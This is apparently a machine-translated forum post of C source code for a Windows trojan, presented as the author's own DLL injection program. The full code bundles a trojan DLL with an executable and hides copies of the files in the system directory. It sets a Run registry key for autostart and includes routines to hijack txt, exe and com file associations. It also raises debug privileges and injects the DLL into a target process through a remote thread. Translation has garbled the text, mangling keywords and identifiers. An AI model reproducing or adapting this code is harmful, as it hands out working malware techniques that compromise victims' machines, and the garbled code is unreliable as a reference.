Trojan dll injection program written by myself

/*************************************** ***************
Name: trojan dll injection program
Function: Call the system hook to inject the trojan dll into the host thread.
Author: Xue Feng
Date: 2004-6-22
Description: Process hiding. This program uses a large number of APIs. For details, refer to msdn.
**************************************** **************/

# Include "stdafx. H"
# Include <tlhelp32.h>
# Include ".. // include // datastruct. H"

// EXE file name
Char g_exename [51];

// Trojan dll File Name
Char g_cockname [51];

// Obtain the EXE file name *. exe
Void getmodulenameex (lptstr BUF)
{
Char path [max_path];
 
If (getmodulefilename (: getmodulehandle (null), path, max_path ))
{
Lptstr P = strrchr (path, 92 );
Strncpy (BUF, & P [1], strlen (p + 1 ));
Strncat (BUF ," ", 1 );
}
}

// Virus File merging Program (API version) New!
DWORD unitefileexa (lpstr lpprogfile, lpstr lpcockfile)
{
Handle hprog = NULL, hcock = NULL;
Filedis;
DWORD dwprog = 0, dwcock = 0, dwnumber = 0;
Char * cbufcock = NULL;

Memset (& filedis, 0, sizeof (filedis ));
// Save the file name
Strncpy (filedis. fileidentifier, fileidentifier, strlen (fileidentifier ));
Strncpy (filedis. progname, lpprogfile, strlen (lpprogfile ));
Strncpy (filedis. cockdllname, lpcockfile, strlen (lpcockfile ));
// Set the decomposition ID to 0.
Filedis. isfilereduced = 0;
// Open the file and return if the call fails.
Hprog = createfile (lpprogfile, generic_read | generic_write, file_share_read, null,
Open_existing, file_attribute_normal, null );
If (hprog = invalid_handle_value)
{
Return 0;
}
Hcock = createfile (lpcockfile, generic_read, file_assist_read, null, open_existing,
File_attribute_normal, null );
If (hcock = invalid_handle_value)
{
Return 0;
}
// EXE file size
Dwprog = getfilesize (hprog, null );
// Trojan dll File Size
Dwcock = getfilesize (hcock, null );
// Save it to the file header record
Filedis. progsize = dwprog;
Filedis. cockdllsize = dwcock;
// Apply for a data buffer for the DLL file and use it to read data
Cbufcock = new char [dwcock + 1];
// Move the file pointer to the end of the EXE file
If (setfilepointer (hprog, 0, null, file_end) = 0 xffffffff)
{
Return 0;
}
// Read the trojan dll file body data to the buffer zone
If (! Readfile (hcock, cbufcock, dwcock, & dwnumber, null ))
{
Return 0;
}
// Write the DLL file body of the Trojan program
If (! Writefile (hprog, cbufcock, dwcock, & dwnumber, null ))
{
Return 0;
}
// Write the file header data to the end of the merged File
If (! Writefile (hprog, & filedis, sizeof (filedis), & dwnumber, null ))
{
Return 0;
}
// Close the file pointer
Closehandle (hprog );
Closehandle (hcock );
// Release the memory
Delete [] cbufcock;
Return 1;
}

// Virus File decomposition Program (API version), and can copy itself to the specified directory. New!
DWORD performancefileexa (lpcstr progname, lpcstr destfiledir)
{
Handle hprog = NULL, hprogdest = NULL, hcock = NULL, htemp = NULL;
Filedis;
Long lstruct = 0;
DWORD dwnumber = 0, dwunite = 0;
Char * cbufprog = NULL, * cbufcock = NULL, * buftemp = NULL;
Char progfilepath [max_path], cockfilepath [max_path], tempfilepath [max_path];

Memset (& filedis, 0, sizeof (filedis ));
// First open the merged File
Hprog = createfile (progname, generic_read, file_assist_read, null, open_existing,
File_attribute_normal, null );
If (hprog = invalid_handle_value)
{
Return 0;
}
Lstruct = sizeof (filedis );
Lstruct =-lstruct;
// Move the file Pointer Forward from the tail
If (setfilepointer (hprog, lstruct, null, file_end) = 0 xffffffff)
{
Return 0;
}
// Read the file header
If (! Readfile (hprog, & filedis, sizeof (filedis), & dwnumber, null ))
{
Return 0;
}
// Check whether the file is legal
If (strncmp (filedis. fileidentifier, fileidentifier, strlen (fileidentifier ))! = 0)
{
Return 0;
}
// Allocate memory and request data buffer
Cbufprog = new char [filedis. progsize + 1];
Cbufcock = new char [filedis. cockdllsize + 1];
/*************************************** **************************************** *****
// Create the target file path
// Int ilen = strlen (destfiledir );
// Strncpy (progfilepath, destfiledir, ilen );
// Strncat (progfilepath, "//", 1 );
// Strncat (progfilepath, filedis. progname, strlen (filedis. progname ));
// Strncpy (hookfilepath, destfiledir, ilen );
// Strncat (hookfilepath, "//", 1 );
// Strncat (hookfilepath, filedis. hookdllname, strlen (filedis. hookdllname ));
// Strncpy (cockfilepath, destfiledir, ilen );
// Strncat (cockfilepath, "//", 1 );
// Strncat (cockfilepath, filedis. cockdllname, strlen (filedis. cockdllname ));
**************************************** **************************************** *****/
Strcpy (progfilepath, destfiledir );
Strcat (progfilepath ,"//");
Strcat (progfilepath, filedis. progname );
Strcpy (cockfilepath, destfiledir );
Strcat (cockfilepath ,"//");
Strcat (cockfilepath, filedis. cockdllname );
// Create and open the EXE file
Hprogdest = createfile (progfilepath, generic_write, file_pai_read, null, create_new,
File_attribute_normal, null );
If (hprogdest = invalid_handle_value)
{
Return 0;
}
// Create and open the trojan dll File
Hcock = createfile (cockfilepath, generic_write, file_assist_read, null, create_new,
File_attribute_normal, null );
If (hcock = invalid_handle_value)
{
Return 0;
}
// File pointer to start
If (setfilepointer (hprog, 0, null, file_begin) = 0 xffffffff)
{
Return false;
}
// Read the EXE file body data in the merged File
If (! Readfile (hprog, cbufprog, filedis. progsize, & dwnumber, null ))
{
Return 0;
}
// Read the trojan dll file data in the merged File
If (! Readfile (hprog, cbufcock, filedis. cockdllsize, & dwnumber, null ))
{
Return 0;
}
// Write the EXE data to the newly created EXE file
If (! Writefile (hprogdest, cbufprog, filedis. progsize, & dwnumber, null ))
{
Return 0;
}
// Write the file header to the end of the EXE
Filedis. isfilereduced = 1; // the file has been decomposed.
If (! Writefile (hprogdest, & filedis, sizeof (filedis), & dwnumber, null ))
{
Return 0;
}
// Write DLL data to the newly created DLL file
If (! Writefile (hcock, cbufcock, filedis. cockdllsize, & dwnumber, null ))
{
Return 0;
}
// Copy your own code
Strncpy (tempfilepath, destfiledir, strlen (destfiledir ));
Strncat (tempfilepath, "// service", 8 );
Createdirectory (tempfilepath, null );
// Hide a folder
Setfileattributes (tempfilepath, file_attribute_hidden );
Strncat (tempfilepath, "//", 1 );
Strncat (tempfilepath, progname, strlen (progname ));
Htemp = createfile (tempfilepath, generic_write, file_assist_read, null, create_new,
File_attribute_normal, null );
If (htemp! = Invalid_handle_value)
{
Dwunite = getfilesize (hprog, null );
Buftemp = new char [dwunite + 1];
Setfilepointer (hprog, 0, null, file_begin );
Readfile (hprog, buftemp, dwunite, & dwnumber, null );
Writefile (htemp, buftemp, dwunite, & dwnumber, null );
}
// Close the file pointer
Closehandle (hprog );
Closehandle (hprogdest );
Closehandle (hcock );
Closehandle (htemp );
// Release the memory
Delete [] cbufprog;
Delete [] cbufcock;
Delete [] buftemp;
// Modify the attributes of the four files to: hidden and read-only.
Setfileattributes (progfilepath, file_attribute_hidden | file_attribute_readonly );
Setfileattributes (cockfilepath, file_attribute_hidden | file_attribute_readonly );
Setfileattributes (tempfilepath, file_attribute_hidden | file_attribute_readonly );
Return 1;
}

/*
Set the registry and run the trojan program automatically upon startup. If the call is successful, 1 is returned. If the call fails, 0 is returned.
Regkeyname: key name in the registry; exepath: absolute path of the Trojan program
*/
Byte setprogautorun (maid)
{
Hkey = NULL;
DWORD dwdis = 0;
Char keyname [51], Buf [51];
Lptstr P = NULL;

If (regcreatekeyex (HKEY_LOCAL_MACHINE, "software // Microsoft // windows // CurrentVersion // run ",
0, null, reg_option_non_volatile, key_all_access, null, & hkey, & dwdis )! = Error_success)
{
Return 0;
}
Strncpy (BUF, regkeyname, strlen (regkeyname ));
P = strrchr (BUF, 46 );
Strncpy (keyname, Buf, p-BUF );
Keyname [(DWORD) (p-BUF)] =' ';
If (regsetvalueex (hkey, keyname, 0, REG_SZ, (byte *) exepath, strlen (exepath ))! =
Error_success)
{
Regclosekey (hkey );
Return 0;
}
Regclosekey (hkey );
Return 1;
}

// Check whether automatic running has been set in the registry; 1 indicates that the operation has been set; 0 indicates that the operation has not been set; 2 indicates that the operation fails due to a key error.
Byte isprogautorun (lpcstr regkeyname)
{
Hkey = NULL;

If (regopenkeyex (HKEY_LOCAL_MACHINE, "software // Microsoft // windows // CurrentVersion // run ",
0, key_execute, & hkey )! = Error_success)
{
Return 2;
}
If (regqueryvalueex (hkey, regkeyname, null) = error_success)
{
Return 1;
}
Else
{
Return 0;
}
}

// Modify the file-related function
Void modifyfilelink (lpcstr lplinkfile)
{
Hkey = NULL;
DWORD dwdis = 0;
Char linkfiletxt [max_path], linkfileexe [max_path];

// Modify the TXT file association
If (regcreatekeyex (hkey_classes_root, "txtfile // shell // open // command", 0, null,
Reg_option_non_volatile, key_all_access, null, & hkey, & dwdis) = error_success)
{
Strncpy (linkfiletxt, lplinkfile, strlen (lplinkfile ));
Strncat (linkfiletxt, "% 1", 3 );
Regsetvalueex (hkey, null, 0, reg_expand_sz, (byte *) linkfiletxt, strlen (linkfiletxt ));
Regclosekey (hkey );
}
// Modify the EXE file association
If (regcreatekeyex (hkey_classes_root, "exefile // shell // open // command", 0, null,
Reg_option_non_volatile, key_all_access, null, & hkey, & dwdis) = error_success)
{
Strncpy (linkfileexe, lplinkfile, strlen (lplinkfile ));
Strncat (linkfileexe, "% 1" % * ", 12 );
Regsetvalueex (hkey, null, 0, REG_SZ, (byte *) linkfileexe, strlen (linkfileexe ));
Regclosekey (hkey );
}
// Modify the COM file association
If (regcreatekeyex (hkey_classes_root, "comfile // shell // open // command", 0, null,
Reg_option_non_volatile, key_all_access, null, & hkey, & dwdis) = error_success)
{
Regsetvalueex (hkey, null, 0, REG_SZ, (byte *) linkfileexe, strlen (linkfileexe ));
Regclosekey (hkey );
}
}

// Modify the default file icon and save the icon resource to the trojan dll.
Void modifyfileicon (lpcstr lplinkfile)
{
Hkey = NULL;
DWORD dwdis = 0;
Char linkfiletxt [max_path], linkfileexe [max_path];

// Modify the TXT file icon
If (regcreatekeyex (hkey_classes_root, "txtfile // defaulticon", 0, null,
Reg_option_non_volatile, key_all_access, null, & hkey, & dwdis) = error_success)
{
Strncpy (linkfiletxt, lplinkfile, strlen (lplinkfile ));
Strncat (linkfiletxt, "% 1", 3 );
Regsetvalueex (hkey, null, 0, reg_expand_sz, (byte *) linkfiletxt, strlen (linkfiletxt ));
Regclosekey (hkey );
}
// Modify the EXE file icon
If (regcreatekeyex (hkey_classes_root, "exefile // defaulticon", 0, null,
Reg_option_non_volatile, key_all_access, null, & hkey, & dwdis) = error_success)
{
Strncpy (linkfileexe, lplinkfile, strlen (lplinkfile ));
Strncat (linkfileexe, "% 1" % * ", 12 );
Regsetvalueex (hkey, null, 0, REG_SZ, (byte *) linkfileexe, strlen (linkfileexe ));
Regclosekey (hkey );
}
// Modify the COM file icon
If (regcreatekeyex (hkey_classes_root, "comfile // defaulticon", 0, null,
Reg_option_non_volatile, key_all_access, null, & hkey, & dwdis) = error_success)
{
Regsetvalueex (hkey, null, 0, reg_expand_sz, (byte *) linkfileexe, strlen (linkfileexe ));
Regclosekey (hkey );
}
}

// Check whether the virus file has been decomposed (API version). 0: not decomposed, 1: decomposed, 2: Call failed, and 3: The file is invalid. New!
DWORD checkfileexa (lpcstr progname)
{
Handle hprog = NULL;
Filedis;
Long lstruct = 0;
DWORD dwnumber = 0, Bret = false;

Memset (& filedis, 0, sizeof (filedis ));
// First open the merged File
Hprog = createfile (progname, generic_read, file_assist_read, null, open_existing,
File_attribute_normal, null );
If (hprog = invalid_handle_value)
{
Return 2;
}
Lstruct = sizeof (filedis );
Lstruct =-lstruct;
// Move the file Pointer Forward from the tail
If (setfilepointer (hprog, lstruct, null, file_end) = 0 xffffffff)
{
Return 2;
}
// Read the file header
If (! Readfile (hprog, & filedis, sizeof (filedis), & dwnumber, null ))
{
Return 2;
}
// Check whether the file is legal
If (strncmp (filedis. fileidentifier, fileidentifier, strlen (fileidentifier) = 0)
{
// Save the trojan dll File Name
Strncpy (g_cockname, filedis. cockdllname, strlen (filedis. cockdllname ));
// Check whether the file has been decomposed
If (filedis. isfilereduced)
{
Bret = 1;
}
Else
{
Bret = 0;
}
}
Else
{
// Invalid
Bret = 3;
}
Closehandle (hprog );
Return Bret;
}

// Find the Memory Sharing area and check whether the trojan program is started. Return 0: not started, 1: started, 2: failed to map to the sharing Area
Byte lookupsharedmem ()
{
Handle hmapping = NULL;
Lpsharedmem = NULL;
Byte Bret = 0;

// Check whether the specified shared area has been created
Hmapping = openfilemapping (file_map_all_access, false, sharedmemname );
If (hmapping)
{
// Map the shared area pointer
Lpsharedmem = (lpsharedmem) mapviewoffile (hmapping, file_map_all_access, 0, 0, 0 );
If (lpsharedmem)
{
// The Trojan program is not started.
If (! Lpsharedmem-> iscockrun)
{
Bret = 0;
}
Else
{
// Trojan started
Bret = 1;
}
}
Else
{
Closehandle (hmapping );
// Failed to map the shared area
Return 2;
}
}
Else
{
// No shared area, Trojan not started
Return 0;
}
Unmapviewoffile (lpsharedmem );
// Closehandle (hmapping );
Return Bret;
}

// Escalate the process permission
DWORD setprocessprivilege ()
{
Handle htoken;
Token_privileges TP;

If (! Openprocesstoken (getcurrentprocess (), token_adjust_privileges, & htoken ))
{
Return 0;
}
Else
{
TP. privilegecount = 1;
If (! Lookupprivilegevalue (null, se_debug_name, & TP. Privileges [0]. luid ))
{
Return 0;
}
TP. Privileges [0]. Attributes = se_privilege_enabled;
If (! Adjusttokenprivileges (htoken, false, & TP, sizeof (TP), null, null ))
{
Return 0;
}
Closehandle (htoken );
}
Return 1;
}

// Obtain the host process id based on the EXE file name
DWORD getdestprocessid (maid)
{
Handle hprocesssnap = NULL;
DWORD dwprocessid = 0;
 
// If the lpcexename is not null, query the specified process ID.
If (lpcexename! = NULL)
{
Hprocesssnap = createconlhelp32snapshot (th32cs_snapprocess, 0 );
If (hprocesssnap> 0)
{
Processentry32 PE;

PE. dwsize = sizeof (processentry32 );
Process32first (hprocesssnap, & PE );
Do
{
If (strcmp (PE. szexefile, lpcexename) = 0)
{
// Find the ID
Dwprocessid = PE. th32processid;
Break;
}
}
While (process32next (hprocesssnap, & PE ));
Closehandle (hprocesssnap );
}
}
Return dwprocessid;
}

// Inject the trojan dll into the host process using a remote thread. If the call succeeds, 1 is returned. Otherwise, 0 is returned.
DWORD runviruscodeex (DWORD dwprocessid, lpcstr lpcockfilename)
{
Handle hprocess = NULL, hthread = NULL;
DWORD dwlen = 0;
Char * plibaddr = NULL;
Hinstance hins = NULL;
Pthread_start_routine PSR = NULL;

Hprocess = OpenProcess (process_create_thread | process_vm_operation | process_vm_write,
False, dwprocessid );
If (hprocess = NULL)
{
Return 0;
}
Dwlen = (strlen (lpcockfilename) + 1) * sizeof (char );
Plibaddr = (char *) virtualallocex (hprocess, null, dwlen, mem_commit, page_readwrite );
If (plibaddr = NULL)
{
Return 0;
}
If (! Writeprocessmemory (hprocess, plibaddr, (lpvoid) lpcockfilename, dwlen, null ))
{
Return 0;
}
Hins = getmodulehandle ("Kernel32 ");
If (hins = NULL)
{
Return 0;
}
PSR = (pthread_start_routine) getprocaddress (hins, "loadlibrarya ");
If (PSR = NULL)
{
Return 0;
}
Hthread = createremotethread (hprocess, null, 0, PSR, plibaddr, 0, null );
If (hthread = NULL)
{
Return 0;
}
// Waitforsingleobject (hthread, infinite );
Closehandle (hthread );
Closehandle (hprocess );
Return 1;
}

// Initialize the program, new!
Void initializationex ()
{
DWORD dwprocessid = 0;

If (! Lookupsharedmem ())
{
Char Buf [max_path];
DWORD Bret = 0;

Getmodulenameex (g_exename );
Getsystemdirectory (BUF, max_path );
Bret = checkfileexa (g_exename );
If (Bret <1)
{
Performancefileexa (g_exename, Buf );
}
Else if (Bret> 1)
{
Return;
}
Strncat (BUF, "//", 1 );
Strncat (BUF, g_exename, strlen (g_exename ));
If (isprogautorun (g_exename) = 0)
{
// Modify the Registry
Setprogautorun (g_exename, Buf );
}
// Modify the File Association
// Modifyfilelink (BUF );
// Improve process Permissions
Setprocessprivilege ();
// Loop until the process ID is found
While (! Dwprocessid)
{
Dwprocessid = getdestprocessid ("mycontrol.exe ");
Sleep (1000 );
}
// Embed the trojan dll into the host process and run the virus program
Runviruscodeex (dwprocessid, g_cockname );
}
}

// Windows program Portal
Int apientry winmain (hinstance, hinstance hprevinstance, lpstr lpcmdline, int ncmdshow)
{
Initializationex ();
Return 0;
}